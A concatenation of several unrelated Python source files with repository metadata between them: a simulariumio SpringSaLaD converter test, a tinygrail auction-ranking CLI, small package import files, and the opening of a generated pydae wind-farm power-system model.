"spatialUnits": {
"magnitude": 10.0,
"name": "nm",
},
"size": {"x": 10.0, "y": 10.0, "z": 20.0},
"cameraDefault": {
"position": {
"x": DEFAULT_CAMERA_SETTINGS.CAMERA_POSITION[0],
"y": DEFAULT_CAMERA_SETTINGS.CAMERA_POSITION[1],
"z": DEFAULT_CAMERA_SETTINGS.CAMERA_POSITION[2],
},
"lookAtPosition": {
"x": DEFAULT_CAMERA_SETTINGS.LOOK_AT_POSITION[0],
"y": DEFAULT_CAMERA_SETTINGS.LOOK_AT_POSITION[1],
"z": DEFAULT_CAMERA_SETTINGS.LOOK_AT_POSITION[2],
},
"upVector": {
"x": DEFAULT_CAMERA_SETTINGS.UP_VECTOR[0],
"y": DEFAULT_CAMERA_SETTINGS.UP_VECTOR[1],
"z": DEFAULT_CAMERA_SETTINGS.UP_VECTOR[2],
},
"fovDegrees": DEFAULT_CAMERA_SETTINGS.FOV_DEGREES,
},
"typeMapping": {
"0": {
"name": "A",
"geometry": {
"displayType": "OBJ",
"url": "a.obj",
"color": "#dfdacd",
},
},
"1": {
"name": "B",
"geometry": {
"displayType": "SPHERE",
"color": "#0080ff",
},
},
"2": {
"name": "GRAY",
"geometry": {
"displayType": "SPHERE",
},
},
"3": {
"name": "CYAN",
"geometry": {
"displayType": "SPHERE",
},
},
"4": {
"name": "BLUE",
"geometry": {
"displayType": "SPHERE",
},
},
},
},
"spatialData": {
"version": CURRENT_VERSION.SPATIAL_DATA,
"msgType": 1,
"bundleStart": 0,
"bundleSize": 2,
"bundleData": [
{
"frameNumber": 0,
"time": 0.0,
"data": [
1000.0,
100000000.0,
0.0,
-2.3515194000000004,
4.1677663,
-0.2872943,
0.0,
0.0,
0.0,
1.0,
0.0,
1000.0,
100010000.0,
0.0,
-1.1726563,
3.7363461000000004,
-0.47181300000000004,
0.0,
0.0,
0.0,
1.0,
0.0,
1000.0,
100200001.0,
1.0,
-0.3749313,
0.6674895000000001,
-0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200000.0,
2.0,
-0.3749313,
0.6674895000000001,
0.000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200002.0,
3.0,
-0.3749313,
0.6674895000000001,
0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100300000.0,
4.0,
-2.9673074,
0.5123882000000001,
5.0633669,
0.0,
0.0,
0.0,
0.1,
0.0,
],
},
{
"frameNumber": 1,
"time": 0.10000000998802996,
"data": [
1000.0,
100200001.0,
1.0,
3.8385084999999997,
-2.5307899000000003,
-0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200000.0,
2.0,
3.7610036000000004,
-2.4899603,
0.000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200002.0,
3.0,
3.6784268,
-2.5100304,
0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100210001.0,
1.0,
0.9422604,
1.1849763,
-0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100300000.0,
4.0,
1.7784686,
0.8480382000000001,
1.8389947,
0.0,
0.0,
0.0,
0.1,
0.0,
],
},
],
},
"plotData": {"version": CURRENT_VERSION.PLOT_DATA, "data": []},
},
),
# truncated data from tutorial example (and draw bonds)
(
SpringsaladData(
sim_view_txt_file=InputFileData(
file_path=(
"simulariumio/tests/data/springsalad/"
"Simulation0_SIM_VIEW_Run0.txt"
),
),
meta_data=MetaData(
scale_factor=0.1,
),
display_data={
"GREEN": DisplayData(
name="A",
radius=10.0,
display_type=DISPLAY_TYPE.OBJ,
url="a.obj",
color="#dfdacd",
),
"RED": DisplayData(
name="B",
color="#0080ff",
),
},
),
{
"trajectoryInfo": {
"version": CURRENT_VERSION.TRAJECTORY_INFO,
"timeUnits": {
"magnitude": 1.0,
"name": "s",
},
"timeStepSize": 0.1,
"totalSteps": 2,
"spatialUnits": {
"magnitude": 10.0,
"name": "nm",
},
"size": {"x": 10.0, "y": 10.0, "z": 20.0},
"cameraDefault": {
"position": {
"x": DEFAULT_CAMERA_SETTINGS.CAMERA_POSITION[0],
"y": DEFAULT_CAMERA_SETTINGS.CAMERA_POSITION[1],
"z": DEFAULT_CAMERA_SETTINGS.CAMERA_POSITION[2],
},
"lookAtPosition": {
"x": DEFAULT_CAMERA_SETTINGS.LOOK_AT_POSITION[0],
"y": DEFAULT_CAMERA_SETTINGS.LOOK_AT_POSITION[1],
"z": DEFAULT_CAMERA_SETTINGS.LOOK_AT_POSITION[2],
},
"upVector": {
"x": DEFAULT_CAMERA_SETTINGS.UP_VECTOR[0],
"y": DEFAULT_CAMERA_SETTINGS.UP_VECTOR[1],
"z": DEFAULT_CAMERA_SETTINGS.UP_VECTOR[2],
},
"fovDegrees": DEFAULT_CAMERA_SETTINGS.FOV_DEGREES,
},
"typeMapping": {
"0": {
"name": "A",
"geometry": {
"displayType": "OBJ",
"url": "a.obj",
"color": "#dfdacd",
},
},
"1": {
"name": "B",
"geometry": {
"displayType": "SPHERE",
"color": "#0080ff",
},
},
"2": {
"name": "GRAY",
"geometry": {
"displayType": "SPHERE",
},
},
"3": {
"name": "CYAN",
"geometry": {
"displayType": "SPHERE",
},
},
"4": {
"name": "BLUE",
"geometry": {
"displayType": "SPHERE",
},
},
"5": {
"name": "Link",
"geometry": {
"displayType": "FIBER",
},
},
},
},
"spatialData": {
"version": CURRENT_VERSION.SPATIAL_DATA,
"msgType": 1,
"bundleStart": 0,
"bundleSize": 2,
"bundleData": [
{
"frameNumber": 0,
"time": 0.0,
"data": [
1000.0,
100000000.0,
0.0,
-2.3515194000000004,
4.1677663,
-0.2872943,
0.0,
0.0,
0.0,
1.0,
0.0,
1000.0,
100010000.0,
0.0,
-1.1726563,
3.7363461000000004,
-0.47181300000000004,
0.0,
0.0,
0.0,
1.0,
0.0,
1000.0,
100200001.0,
1.0,
-0.3749313,
0.6674895000000001,
-0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200000.0,
2.0,
-0.3749313,
0.6674895000000001,
0.000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200002.0,
3.0,
-0.3749313,
0.6674895000000001,
0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100300000.0,
4.0,
-2.9673074,
0.5123882000000001,
5.0633669,
0.0,
0.0,
0.0,
0.1,
0.0,
1001.0,
0.0,
5.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
1.0,
6.0,
-0.3749313,
0.6674895000000001,
0.000000,
-0.3749313,
0.6674895000000001,
-0.5000000,
1001.0,
1.0,
5.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
1.0,
6.0,
-0.3749313,
0.6674895000000001,
0.000000,
-0.3749313,
0.6674895000000001,
0.5000000,
],
},
{
"frameNumber": 1,
"time": 0.10000000998802996,
"data": [
1000.0,
100200001.0,
1.0,
3.8385084999999997,
-2.5307899000000003,
-0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200000.0,
2.0,
3.7610036000000004,
-2.4899603,
0.000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200002.0,
3.0,
3.6784268,
-2.5100304,
0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100210001.0,
1.0,
0.9422604,
1.1849763,
-0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100300000.0,
4.0,
1.7784686,
0.8480382000000001,
1.8389947,
0.0,
0.0,
0.0,
0.1,
0.0,
1001.0,
0.0,
5.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
1.0,
6.0,
3.7610036000000004,
-2.4899603,
0.000000,
3.8385084999999997,
-2.5307899000000003,
-0.5000000,
1001.0,
1.0,
5.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
1.0,
6.0,
3.7610036000000004,
-2.4899603,
0.000000,
3.6784268,
-2.5100304,
0.5000000,
],
},
],
},
"plotData": {"version": CURRENT_VERSION.PLOT_DATA, "data": []},
},
),
],
)
def test_springsalad_converter(trajectory, expected_data):
converter = SpringsaladConverter(trajectory)
buffer_data = converter._read_trajectory_data(converter._data)
assert expected_data == buffer_data
assert converter._check_agent_ids_are_unique_per_frame(buffer_data)
| 39.598958
| 79
| 0.209873
| 1,170
| 22,809
| 3.983761
| 0.135043
| 0.096975
| 0.102982
| 0.106415
| 0.880927
| 0.880927
| 0.854323
| 0.83673
| 0.83673
| 0.83673
| 0
| 0.28152
| 0.716252
| 22,809
| 575
| 80
| 39.667826
| 0.438659
| 0.005831
| 0
| 0.864198
| 0
| 0
| 0.053105
| 0.005734
| 0
| 0
| 0
| 0
| 0.003527
| 1
| 0.001764
| false
| 0
| 0.007055
| 0
| 0.008818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d17077384224f2e5e6364a96bb41766a645715e2
| 8,170
|
py
|
Python
|
src/bgmtinygrail/cli/rr_top.py
|
no1xsyzy/bgmtinygrail
|
4e762a58337f3021440a070967f1cb7a0213f8a6
|
[
"MIT"
] | 5
|
2020-05-17T02:41:01.000Z
|
2020-07-01T23:24:41.000Z
|
src/bgmtinygrail/cli/rr_top.py
|
no1xsyzy/bgmtinygrail
|
4e762a58337f3021440a070967f1cb7a0213f8a6
|
[
"MIT"
] | null | null | null |
src/bgmtinygrail/cli/rr_top.py
|
no1xsyzy/bgmtinygrail
|
4e762a58337f3021440a070967f1cb7a0213f8a6
|
[
"MIT"
] | 1
|
2021-02-09T04:41:15.000Z
|
2021-02-09T04:41:15.000Z
|
from datetime import datetime
from math import ceil, floor
import click
from ._base import TG_PLAYER
from ..tinygrail.api import top_week, character_auction, my_auctions
from ..tinygrail.bigc import BigC
def calculate_target_extra(target_rank):
if target_rank in range(1, 4):
return 2000 - 500 * (target_rank - 1)
if target_rank in range(4, 13):
return 500 - 50 * (target_rank - 4)
raise ValueError
def wrap_do_auction(big_c, name):
def wrapped(price, amount, allow_dec):
print(f"{name}.do_auction({price=}, {amount=}, {allow_dec=}) # {price*amount=}")
big_c.do_auction(price, amount, allow_dec=allow_dec)
return wrapped
@click.command()
@click.argument('catcher', type=TG_PLAYER)
@click.argument('thrower', type=TG_PLAYER)
@click.argument('cid', type=int)
@click.argument('target_rank', type=click.IntRange(1, 12))
def rr_top(catcher, thrower, cid, target_rank):
if target_rank in range(1, 4):
click.confirm(f"You are requesting rank {target_rank}, "
"which will cause loss of used cc's, sure?", abort=True)
target_extra = calculate_target_extra(target_rank)
now_top_week = top_week()
def get_rank():
nonlocal now_top_week
now_top_week = top_week()
try:
return next(i for i, e in enumerate(now_top_week) if e.character_id == cid) + 1
except StopIteration:
return 10000
catcher_bc = BigC(catcher, cid)
catcher_bc_do_auction = wrap_do_auction(catcher_bc, "catcher_bc")
thrower_bc = BigC(thrower, cid)
thrower_bc_do_auction = wrap_do_auction(thrower_bc, "thrower_bc")
allow_dec = datetime.today().isoweekday() != 6
ca = character_auction(catcher, cid)
total_can_get = ca.amount + target_extra
base_price = ca.price
normalized_base_price = ceil(base_price * 100) * 0.01
if not my_auctions(thrower, [cid]):
thrower_bc.do_auction(normalized_base_price, 1)
if not my_auctions(catcher, [cid]):
catcher_bc.do_auction(normalized_base_price, 1)
catch_price = max(normalized_base_price + 0.01, catcher_bc.my_auction_price)
if allow_dec:
step = 1024
catcher_bc_do_auction(catch_price, total_can_get, allow_dec)
else:
step = 1
reg = None
while (rank := get_rank()) != target_rank:
if rank > 100:
current_total_value = thrower_bc.my_auction_total_value
ca = character_auction(thrower, cid) # should be fetched again
target_delta_value = (min(tw.score_1 for tw in now_top_week)) / ca.auction_users
thrower_bc_do_auction(
normalized_base_price,
floor((current_total_value + target_delta_value) / normalized_base_price) + 1,
allow_dec
)
elif rank > target_rank:
if reg is True:
step = (step + 1) // 2
reg = False
print(f"{rank} == rank > target_rank == {target_rank}")
if catcher_bc.my_auction_amount < total_can_get:
catcher_bc_do_auction(catch_price, catcher_bc.my_auction_amount + 1, allow_dec)
else:
current_total_value = thrower_bc.my_auction_total_value
print(f"{current_total_value=}")
target_delta_value = now_top_week[target_rank - 1].score_2 - now_top_week[rank - 1].score_2
print(f"{target_delta_value=}")
thrower_bc_do_auction(
normalized_base_price,
floor((current_total_value + target_delta_value) / normalized_base_price) + 1,
allow_dec
)
else: # rank < target_rank
if reg is False:
step = (step + 1) // 2
reg = True
print(f"{rank} == rank < target_rank == {target_rank}")
if catcher_bc.my_auction_amount > total_can_get:
catcher_bc_do_auction(catch_price, catcher_bc.my_auction_amount - 1, allow_dec)
else:
thrower_bc_do_auction(
normalized_base_price,
ceil(thrower_bc.my_auction_total_value / normalized_base_price) - step,
allow_dec
)
else:
print(f"{rank} == rank == target_rank == {target_rank}")
@click.command()
@click.argument('catcher', type=TG_PLAYER)
@click.argument('cid', type=int)
@click.option('-p', '--catch-price', type=float, default=None)
@click.option('-n', '--catch-amount', type=int, default=None)
@click.option('-t', '--target-rank', type=click.IntRange(1, 12), default=None)
def rr_top_catch(catcher, cid, catch_amount, target_rank, catch_price):
if catch_amount is None and target_rank is None:
raise ValueError
if catch_price is None or catch_amount is None:
ca = character_auction(catcher, cid)
if catch_amount is None:
assert target_rank is not None
catch_amount = ca.amount + calculate_target_extra(target_rank)
if catch_price is None:
catch_price = ceil(ca.price * 100) * 0.01 + 0.01
catcher_bc = BigC(catcher, cid)
catcher_bc_do_auction = wrap_do_auction(catcher_bc, "catcher_bc")
allow_dec = datetime.today().isoweekday() != 6
catcher_bc_do_auction(catch_price, catch_amount, allow_dec)
@click.command()
@click.argument('thrower', type=TG_PLAYER)
@click.argument('cid', type=int)
@click.argument('target_rank', type=click.IntRange(1, 12))
def rr_top_throw(thrower, cid, target_rank):
if target_rank in range(1, 4):
click.confirm(f"You are requesting rank {target_rank}, "
"which will cause loss of used cc's, sure?", abort=True)
now_top_week = top_week()
def get_rank():
nonlocal now_top_week
now_top_week = top_week()
try:
return next(i for i, e in enumerate(now_top_week) if e.character_id == cid) + 1
except StopIteration:
return 10000
thrower_bc = BigC(thrower, cid)
thrower_bc_do_auction = wrap_do_auction(thrower_bc, "thrower_bc")
ca = character_auction(thrower, cid)
base_price = ca.price
normalized_base_price = ceil(base_price * 100) * 0.01
allow_dec = datetime.today().isoweekday() != 6
if allow_dec:
step = 1024
else:
step = 1
if not my_auctions(thrower, [cid]):
thrower_bc_do_auction(
normalized_base_price,
1,
allow_dec
)
reg = None
while (rank := get_rank()) != target_rank:
if rank > 100:
current_total_value = thrower_bc.my_auction_total_value
ca = character_auction(thrower, cid)
target_delta_value = (min(tw.score_1 for tw in now_top_week)) / ca.auction_users
thrower_bc_do_auction(
normalized_base_price,
floor((current_total_value + target_delta_value) / normalized_base_price) + 1,
allow_dec
)
elif rank > target_rank:
if reg is True:
step = (step + 1) // 2
reg = False
print(f"{rank} == rank > target_rank == {target_rank}")
current_total_value = thrower_bc.my_auction_total_value
print(f"{current_total_value=}")
target_delta_value = now_top_week[target_rank - 1].score_2 - now_top_week[rank - 1].score_2
print(f"{target_delta_value=}")
thrower_bc_do_auction(
normalized_base_price,
floor((current_total_value + target_delta_value) / normalized_base_price) + 1,
allow_dec
)
else: # rank < target_rank
if reg is False:
step = (step + 1) // 2
reg = True
print(f"{rank} == rank < target_rank == {target_rank}")
thrower_bc_do_auction(
normalized_base_price,
ceil(thrower_bc.my_auction_total_value / normalized_base_price) - step,
allow_dec
)
else:
print(f"{rank} == rank == target_rank == {target_rank}")
| 36.473214
| 107
| 0.619706
| 1,076
| 8,170
| 4.379182
| 0.121747
| 0.082767
| 0.059423
| 0.0382
| 0.828098
| 0.773557
| 0.726655
| 0.700127
| 0.700127
| 0.690365
| 0
| 0.019454
| 0.282742
| 8,170
| 223
| 108
| 36.636771
| 0.784642
| 0.007466
| 0
| 0.741935
| 0
| 0
| 0.090561
| 0.013942
| 0
| 0
| 0
| 0
| 0.005376
| 1
| 0.043011
| false
| 0
| 0.032258
| 0
| 0.112903
| 0.05914
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0f30cc4792468e9df5ffaf411d36798a60211a9c
| 116
|
py
|
Python
|
mwhiv/views/__init__.py
|
uw-ictd/mwbase
|
6a46b5c5459a6bb6e1ba84ea74f689da8efe9687
|
[
"Apache-2.0"
] | 1
|
2021-07-17T00:18:06.000Z
|
2021-07-17T00:18:06.000Z
|
mwpriya/views/__init__.py
|
akettel/mwbase
|
873b4fe8038f16feba5273990b0eb2109f8f05c6
|
[
"Apache-2.0"
] | 4
|
2017-08-31T17:09:53.000Z
|
2018-11-28T06:01:00.000Z
|
mwpriya/views/__init__.py
|
akettel/mwbase
|
873b4fe8038f16feba5273990b0eb2109f8f05c6
|
[
"Apache-2.0"
] | 2
|
2018-09-17T22:06:16.000Z
|
2021-07-17T00:18:09.000Z
|
from . import crispy
from mwbase.views.ajax import *
from mwbase.views.misc import *
from mwbase.views.old import *
| 23.2
| 31
| 0.775862
| 18
| 116
| 5
| 0.444444
| 0.333333
| 0.5
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 116
| 4
| 32
| 29
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7e745752d093682d95b3d131defa4bee1e2f71a6
| 201
|
py
|
Python
|
brainlit/algorithms/generate_fragments/__init__.py
|
neurodata/brainl
|
2de7b5b161000d4d0957de4e836c9e72f7b62ec0
|
[
"Apache-2.0"
] | null | null | null |
brainlit/algorithms/generate_fragments/__init__.py
|
neurodata/brainl
|
2de7b5b161000d4d0957de4e836c9e72f7b62ec0
|
[
"Apache-2.0"
] | 6
|
2020-01-31T22:21:10.000Z
|
2020-01-31T22:24:59.000Z
|
brainlit/algorithms/generate_fragments/__init__.py
|
neurodata/brainl
|
2de7b5b161000d4d0957de4e836c9e72f7b62ec0
|
[
"Apache-2.0"
] | null | null | null |
from brainlit.algorithms.generate_fragments.tube_seg import *
from brainlit.algorithms.generate_fragments.adaptive_thresh import *
from brainlit.algorithms.generate_fragments.state_generation import *
| 50.25
| 69
| 0.880597
| 24
| 201
| 7.125
| 0.5
| 0.210526
| 0.385965
| 0.526316
| 0.754386
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059701
| 201
| 3
| 70
| 67
| 0.904762
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
7e7b7bbbd55a8439c9c9ff37c3276088b33c6cb9
| 186,483
|
py
|
Python
|
examples/grids/grid_bpu/wind_farm/wind_farm.py
|
pydae/pydae
|
8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d
|
[
"MIT"
] | 1
|
2020-12-20T03:45:26.000Z
|
2020-12-20T03:45:26.000Z
|
examples/grids/grid_bpu/wind_farm/wind_farm.py
|
pydae/pydae
|
8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d
|
[
"MIT"
] | null | null | null |
examples/grids/grid_bpu/wind_farm/wind_farm.py
|
pydae/pydae
|
8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d
|
[
"MIT"
] | null | null | null |
import numpy as np
import numba
import scipy.optimize as sopt
import json
sin = np.sin
cos = np.cos
atan2 = np.arctan2
sqrt = np.sqrt
sign = np.sign
exp = np.exp
class wind_farm_class:
def __init__(self):
self.t_end = 10.000000
self.Dt = 0.0010000
self.decimation = 10.000000
self.itol = 1e-6
self.Dt_max = 0.001000
self.Dt_min = 0.001000
self.solvern = 5
self.imax = 100
self.N_x = 4
self.N_y = 30
self.N_z = 12
self.N_store = 10000
self.params_list = ['S_base', 'g_W1mv_W2mv', 'b_W1mv_W2mv', 'bs_W1mv_W2mv', 'g_W2mv_W3mv', 'b_W2mv_W3mv', 'bs_W2mv_W3mv', 'g_W3mv_POImv', 'b_W3mv_POImv', 'bs_W3mv_POImv', 'g_STmv_POImv', 'b_STmv_POImv', 'bs_STmv_POImv', 'g_POI_GRID', 'b_POI_GRID', 'bs_POI_GRID', 'g_POI_POImv', 'b_POI_POImv', 'bs_POI_POImv', 'g_W1mv_W1lv', 'b_W1mv_W1lv', 'bs_W1mv_W1lv', 'g_W2mv_W2lv', 'b_W2mv_W2lv', 'bs_W2mv_W2lv', 'g_W3mv_W3lv', 'b_W3mv_W3lv', 'bs_W3mv_W3lv', 'g_STmv_STlv', 'b_STmv_STlv', 'bs_STmv_STlv', 'U_W1lv_n', 'U_W2lv_n', 'U_W3lv_n', 'U_STlv_n', 'U_W1mv_n', 'U_W2mv_n', 'U_W3mv_n', 'U_POImv_n', 'U_STmv_n', 'U_POI_n', 'U_GRID_n', 'S_n_GRID', 'Omega_b_GRID', 'K_p_GRID', 'T_p_GRID', 'K_q_GRID', 'T_v_GRID', 'X_v_GRID', 'R_v_GRID', 'K_delta_GRID', 'K_sec_GRID', 'Droop_GRID', 'K_p_agc', 'K_i_agc']
self.params_values_list = [100000000.0, 25.385137099118303, -11.433000678228852, 0.0, 25.385137099118303, -11.433000678228852, 0.0, 25.385137099118303, -11.433000678228852, 0.0, 25.385137099118303, -11.433000678228852, 0.0, 2.7644414300939832, -1.2450537738591219, 0.0, 1.923076923076923, -0.38461538461538464, 0.0, 0.4054054054054054, -0.06756756756756757, 0.0, 0.4054054054054054, -0.06756756756756757, 0.0, 0.4054054054054054, -0.06756756756756757, 0.0, 0.4054054054054054, -0.06756756756756757, 0.0, 690.0, 690.0, 690.0, 690.0, 20000.0, 20000.0, 20000.0, 20000.0, 20000.0, 66000.0, 66000.0, 50000000.0, 314.1592653589793, 0.01, 0.1, 0.01, 0.1, 0.1, 0.01, 0.001, 0.0, 0.05, 0.01, 0.01]
self.inputs_ini_list = ['P_W1lv', 'Q_W1lv', 'P_W2lv', 'Q_W2lv', 'P_W3lv', 'Q_W3lv', 'P_STlv', 'Q_STlv', 'P_W1mv', 'Q_W1mv', 'P_W2mv', 'Q_W2mv', 'P_W3mv', 'Q_W3mv', 'P_POImv', 'Q_POImv', 'P_STmv', 'Q_STmv', 'P_POI', 'Q_POI', 'P_GRID', 'Q_GRID', 'v_ref_GRID', 'p_m_GRID', 'p_c_GRID', 'omega_ref_GRID', 'q_ref_GRID']
self.inputs_ini_values_list = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.1, 1.0, 0.0, 1.0, 0.0]
self.inputs_run_list = ['P_W1lv', 'Q_W1lv', 'P_W2lv', 'Q_W2lv', 'P_W3lv', 'Q_W3lv', 'P_STlv', 'Q_STlv', 'P_W1mv', 'Q_W1mv', 'P_W2mv', 'Q_W2mv', 'P_W3mv', 'Q_W3mv', 'P_POImv', 'Q_POImv', 'P_STmv', 'Q_STmv', 'P_POI', 'Q_POI', 'P_GRID', 'Q_GRID', 'v_ref_GRID', 'p_m_GRID', 'p_c_GRID', 'omega_ref_GRID', 'q_ref_GRID']
self.inputs_run_values_list = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.1, 1.0, 0.0, 1.0, 0.0]
self.outputs_list = ['V_W1lv', 'V_W2lv', 'V_W3lv', 'V_STlv', 'V_W1mv', 'V_W2mv', 'V_W3mv', 'V_POImv', 'V_STmv', 'V_POI', 'V_GRID', 'p_e_GRID']
self.x_list = ['delta_GRID', 'xi_p_GRID', 'e_qv_GRID', 'xi_freq']
self.y_run_list = ['V_W1lv', 'theta_W1lv', 'V_W2lv', 'theta_W2lv', 'V_W3lv', 'theta_W3lv', 'V_STlv', 'theta_STlv', 'V_W1mv', 'theta_W1mv', 'V_W2mv', 'theta_W2mv', 'V_W3mv', 'theta_W3mv', 'V_POImv', 'theta_POImv', 'V_STmv', 'theta_STmv', 'V_POI', 'theta_POI', 'V_GRID', 'theta_GRID', 'omega_GRID', 'i_d_GRID', 'i_q_GRID', 'p_g_GRID', 'q_g_GRID', 'p_m_GRID', 'omega_coi', 'p_agc']
self.xy_list = self.x_list + self.y_run_list
self.y_ini_list = ['V_W1lv', 'theta_W1lv', 'V_W2lv', 'theta_W2lv', 'V_W3lv', 'theta_W3lv', 'V_STlv', 'theta_STlv', 'V_W1mv', 'theta_W1mv', 'V_W2mv', 'theta_W2mv', 'V_W3mv', 'theta_W3mv', 'V_POImv', 'theta_POImv', 'V_STmv', 'theta_STmv', 'V_POI', 'theta_POI', 'V_GRID', 'theta_GRID', 'omega_GRID', 'i_d_GRID', 'i_q_GRID', 'p_g_GRID', 'q_g_GRID', 'p_m_GRID', 'omega_coi', 'p_agc']
self.xy_ini_list = self.x_list + self.y_ini_list
self.t = 0.0
self.it = 0
self.it_store = 0
self.xy_prev = np.zeros((self.N_x+self.N_y,1))
self.initialization_tol = 1e-6
self.N_u = len(self.inputs_run_list)
self.sopt_root_method='hybr'
self.sopt_root_jac=True
self.u_ini_list = self.inputs_ini_list
self.u_ini_values_list = self.inputs_ini_values_list
self.u_run_list = self.inputs_run_list
self.u_run_values_list = self.inputs_run_values_list
self.N_u = len(self.u_run_list)
Fx_ini_rows,Fx_ini_cols,Fy_ini_rows,Fy_ini_cols,Gx_ini_rows,Gx_ini_cols,Gy_ini_rows,Gy_ini_cols = nonzeros()
self.Fx_ini_rows = np.array(Fx_ini_rows)
if len(Fx_ini_rows) == 1:
self.Fx_ini_rows = np.array([[Fx_ini_rows]]).reshape(1,)
self.Fx_ini_cols = np.array([[Fx_ini_cols]]).reshape(1,)
self.Fx_ini_cols = np.array(Fx_ini_cols)
self.Fy_ini_rows = np.array(Fy_ini_rows)
self.Fy_ini_cols = np.array(Fy_ini_cols)
self.Gx_ini_rows = np.array(Gx_ini_rows)
self.Gx_ini_cols = np.array(Gx_ini_cols)
self.Gy_ini_rows = np.array(Gy_ini_rows)
self.Gy_ini_cols = np.array(Gy_ini_cols)
self.yini2urun = list(set(self.inputs_run_list).intersection(set(self.y_ini_list)))
self.uini2yrun = list(set(self.y_run_list).intersection(set(self.inputs_ini_list)))
self.update()
def update(self):
self.N_steps = int(np.ceil(self.t_end/self.Dt))
dt = [
('t_end', np.float64),
('Dt', np.float64),
('decimation', np.float64),
('itol', np.float64),
('Dt_max', np.float64),
('Dt_min', np.float64),
('solvern', np.int64),
('imax', np.int64),
('N_steps', np.int64),
('N_store', np.int64),
('N_x', np.int64),
('N_y', np.int64),
('N_z', np.int64),
('t', np.float64),
('it', np.int64),
('it_store', np.int64),
('idx', np.int64),
('idy', np.int64),
('f', np.float64, (self.N_x,1)),
('x', np.float64, (self.N_x,1)),
('x_0', np.float64, (self.N_x,1)),
('g', np.float64, (self.N_y,1)),
('y_run', np.float64, (self.N_y,1)),
('y_ini', np.float64, (self.N_y,1)),
('u_run', np.float64, (self.N_u,1)),
('y_0', np.float64, (self.N_y,1)),
('h', np.float64, (self.N_z,1)),
('Fx', np.float64, (self.N_x,self.N_x)),
('Fy', np.float64, (self.N_x,self.N_y)),
('Gx', np.float64, (self.N_y,self.N_x)),
('Gy', np.float64, (self.N_y,self.N_y)),
('Fu', np.float64, (self.N_x,self.N_u)),
('Gu', np.float64, (self.N_y,self.N_u)),
('Hx', np.float64, (self.N_z,self.N_x)),
('Hy', np.float64, (self.N_z,self.N_y)),
('Hu', np.float64, (self.N_z,self.N_u)),
('Fx_ini', np.float64, (self.N_x,self.N_x)),
('Fy_ini', np.float64, (self.N_x,self.N_y)),
('Gx_ini', np.float64, (self.N_y,self.N_x)),
('Gy_ini', np.float64, (self.N_y,self.N_y)),
('T', np.float64, (self.N_store+1,1)),
('X', np.float64, (self.N_store+1,self.N_x)),
('Y', np.float64, (self.N_store+1,self.N_y)),
('Z', np.float64, (self.N_store+1,self.N_z)),
('iters', np.float64, (self.N_store+1,1)),
('store', np.int64),
('Fx_ini_rows', np.int64, self.Fx_ini_rows.shape),
('Fx_ini_cols', np.int64, self.Fx_ini_cols.shape),
('Fy_ini_rows', np.int64, self.Fy_ini_rows.shape),
('Fy_ini_cols', np.int64, self.Fy_ini_cols.shape),
('Gx_ini_rows', np.int64, self.Gx_ini_rows.shape),
('Gx_ini_cols', np.int64, self.Gx_ini_cols.shape),
